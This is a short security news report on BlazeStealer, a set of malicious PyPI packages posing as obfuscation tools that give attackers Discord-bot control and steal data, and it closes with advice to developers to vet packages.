BlazeStealer [1] [2] [3] [4], a new set of malicious Python packages [1] [3] [4], has recently been discovered on the Python Package Index (PyPI) repository [1] [3] [4]. These packages [1] [3] [4], disguised as harmless obfuscation tools [3], actually contain malware that steals sensitive information from compromised developer systems [1].


BlazeStealer is a collection of eight packages found on PyPI, including Pyobftoexe and Pyobfusfile [3]. Once installed, these packages retrieve a malicious script from an external source, allowing attackers to gain control over a victim’s computer through a Discord bot [4]. This campaign, which began in January 2023 [4], poses significant threats as the malware is capable of executing commands, encrypting files [2] [3] [4], and rendering the computer unusable [3] [4].

According to security researcher Yehuda Gelb [2], BlazeStealer is a Discord bot that carries out various malicious activities [2]. It can steal passwords from web browsers, capture screenshots, disable Microsoft Defender Antivirus [2], and execute arbitrary commands. Additionally, it has the ability to encrypt files, making them inaccessible to the victim.

The majority of downloads of these packages originated from the US [3], followed by China [3] [4], Russia [3] [4], and other countries [3] [4]. In light of this discovery, developers are advised to remain vigilant and carefully vet packages before consumption in order to protect their systems and data.


BlazeStealer poses a significant threat to developers and their systems. It is crucial for developers to exercise caution and thoroughly evaluate packages before installation. By remaining vigilant [4], developers can mitigate the risk of falling victim to this malware. The discovery of BlazeStealer also highlights the need for increased security measures and ongoing monitoring of the Python Package Index to prevent similar incidents in the future.